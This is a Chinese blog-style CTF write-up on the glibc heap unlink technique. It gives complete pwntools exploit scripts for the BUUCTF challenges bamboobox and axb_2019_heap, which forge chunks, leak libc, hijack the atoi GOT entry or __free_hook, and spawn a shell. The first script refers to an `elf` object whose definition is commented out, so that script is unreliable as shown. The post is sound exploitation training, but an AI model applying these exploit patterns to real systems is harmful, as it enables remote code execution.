buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结

最新推荐文章于 2022-01-20 14:55:29 发布
最新推荐文章于 2022-01-20 14:55:29 发布
阅读量173 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/118642108
版权

两道都是使用了unlink

并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样
使用unlink的题目一般有这样的特征

  1. 指针位置泄露(这三道题全都是在bss上的指针)
  2. 存在off-by-one或者off-by-null以及其他溢出修改漏洞
    第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。

利用方法:

  1. 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chunk的prev_inuse位,释放下一个chunk,触发unlink以修改地址
  2. 泄露地址,editptr+0x18位置为某个got表,使用show打印放在该数据(注意填充)
  3. 修改ptr+18处数据为system
  4. 对相关函数填上binsh字符串参数,getshell

hitcon_training

from pwn import *
# io = process('./bamboobox')
io = remote('node4.buuoj.cn',29838)
libc= ELF('./libc-2.23.so')
# elf = ELF('./bamboobox')
context.log_level='debug'

def show():
    io.recvuntil('choice:')
    io.sendline(str(1))


def add(length,content):
    io.recvuntil('choice:')
    io.sendline(str(2))
    io.recvuntil('name:')
    io.sendline(str(length))
    io.recvuntil('item:')
    io.sendline(str(content))

def edit(index,len,content):
    io.recvuntil('choice:')
    io.sendline(str(3))
    io.recvuntil('index of item:')
    io.sendline(str(index))
    io.recvuntil('item name:')
    io.sendline(str(len))
    io.recvuntil('name of the item:')
    io.sendline(content)

def delete(id):
    io.recvuntil('choice:')
    io.sendline(str(4))
    io.recvuntil('index of item:')
    io.sendline(str(id))



chunk_head = 0x6020C8
puts_got = elf.got['puts']




add(0x40,'a')
add(0x80,'a')
add(0x80,'a')


# step1: create unlink condition
payload1 = p64(0)+p64(0x41)+p64(chunk_head-0x18)+p64(chunk_head-0x10)+'a'*0x20+p64(0x40)+p64(0x90) #0x90 overflow
edit(0,0x50,payload1)
# gdb.attach(io,"b *0x400C4D")
delete(1)

# step2:leak addr
atoi_got = elf.got['atoi']
# gdb.attach(io,"b *0x400B23")
edit(0,0x80,p64(0)*3+p64(atoi_got))
show()
io.recvuntil('0 : ')
puts_addr = u64(io.recvuntil('\x7f').ljust(8,'\x00'))
print "puts----->" + hex(puts_addr)

libc_base = puts_addr - libc.sym['atoi']
print "libc_base----->" + hex(libc_base)
pause()
libc_system = libc.sym['system']
system_addr = libc_base + libc_system

# step3: hook_hijack
edit(0,0x8,p64(system_addr))
io.recvuntil('choice:')
io.sendline('/bin/sh\x00')

io.interactive()

axb_2019_heap

这道题由于开了full_relro,不能GOT_HIJACK因此只能通过修改hook实现

from pwn import *
# from LibcSearcher import *
context.log_level = 'debug'

# unlink
io = process('./axb_2019_heap')
# io = remote('node4.buuoj.cn',26275)
libc = ELF('./libc-2.23.so')

def add(index,size,con):
    io.recvuntil('>> ')
    io.sendline(str(1))
    io.recvuntil('(0-10):')
    io.sendline(str(index))
    io.recvuntil('size:\n')
    io.sendline(str(size))
    io.recvuntil('content: \n')
    io.sendline(con)
    io.recvline()

def delete(index):
    io.recvuntil('>> ')
    io.sendline(str(2))
    io.recvuntil('index:\n')
    io.sendline(str(index))
    io.recvline()


def edit(index,content):
    io.recvuntil('>> ')
    io.sendline(str(4))
    io.recvuntil('index:\n')
    io.sendline(str(index))
    io.recvuntil('content: \n')
    io.sendline(content)
    io.recvline()

# step1: leak code-loading base and libc_addr
# using fmtstr in ini()
payload1 = '%15$p.%19$p'
io.sendlineafter('Enter your name: ',payload1)
io.recvuntil('Hello, ')
libc_start_240 = int(io.recvuntil('.')[:-1],16)
main_addr = int(io.recvuntil('\n'),16)

print "libc_start_240----->" + hex(libc_start_240)
print "main----->" + hex(main_addr)
pie_base = main_addr-0x116a
print "pie_base----->" + hex(pie_base)
libc_start_main_addr = libc_start_240-240
print "libc_start_main----->" + hex(libc_start_main_addr)
libc_base = libc_start_main_addr - libc.sym['__libc_start_main']
print "libc_base----->" + hex(libc_base)
system_addr=libc_base+libc.symbols["system"]
free_hook=libc_base+libc.symbols["__free_hook"]


#step2: fake_unlink
ptr = 0x202060+pie_base

add(0,0x98,p64(0)) #chunk0
add(1,0x90,p64(1)) #chunk1
payload2 = p64(0)+p64(0x91)+p64(ptr-0x18)+p64(ptr-0x10) # fake chunk
payload2+='a'*0x70+p64(0x90)+'\xa0'
edit(0,payload2)
# gdb.attach(io,"brva 0xF88")
delete(1) # trigger unlink

payload3 = p64(0)*3+p64(free_hook)+p64(0x38)
edit(0,payload3)
gdb.attach(io,"brva 0x108c")
edit(0,p64(system_addr))
add(2,0x88,'/bin/sh\x00')

io.recvuntil('>> ')
io.sendline(str(2))
io.recvuntil('index:\n')
io.sendline(str(2))


io.interactive()
N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
heap_exploit_2.31
03-21
堆攻击2.31 glibc 2.31版中有关ptmalloc的堆利用。...其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 982
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
axb_2019_heap
z1r0的博客
01-20 676
axb_2019_heap 查看保护 在get_input这个函数里有一个off-by-one size大小>0x80 字符串格式化溢出 利用字符串格式化溢出,泄漏程序地址和libc,因为有一个off-by-one,这里采用unlink,因为程序会创建全局变量note来放入指针和size,unlink到这里改指针为hook,改hook为one_gadget即可。具体unlink手法见z1r0’s blog from pwn import * context(arch='amd64', os=
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1575
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru 安全建设 水坑攻击 威胁情报 安全体系 web安全
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week 安全 安全威胁 漏洞挖掘 信息安全研究 威胁检测
HITCON 2019PPT汇总(17份).zip
01-03
'Duplicate Paths Attack - Get Elevated Privilege from Forged Identities.pdf', 'Finding Treasures in the ToyBox.pdf', 'Fuzzing AOSP for Non-crash bugs.pdf', 'HITCON Badge 2019 秘辛:MCU ARM TrustZone ...
hitcontraining_unlink
z1r0的博客
01-13 376
hitcontraining_unlink 查看保护 在change功能里没有检查size大小。一开始直接打hook来着,结果最后add时出问题。。。。。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27530) else: r = process
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1256
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 754
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
axb_2019_heap详解
像初雪一样自由洒落
04-25 579
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 413
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 170
unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 662
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
AXB
weixin_30580341的博客
01-21 625
大数相乘 sum中,高位在前,所以两个乘数必须先转换一下,即末位在前,依此类推。 View Code 1 #include<stdio.h> 2 #include<string.h> 3 const int maxn = 505; 4 char a[ maxn ],b[ maxn ]; 5 int sum[ maxn*2 ]; 6...
shanghai2019_boringheap
doudoudedi
02-18 350
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值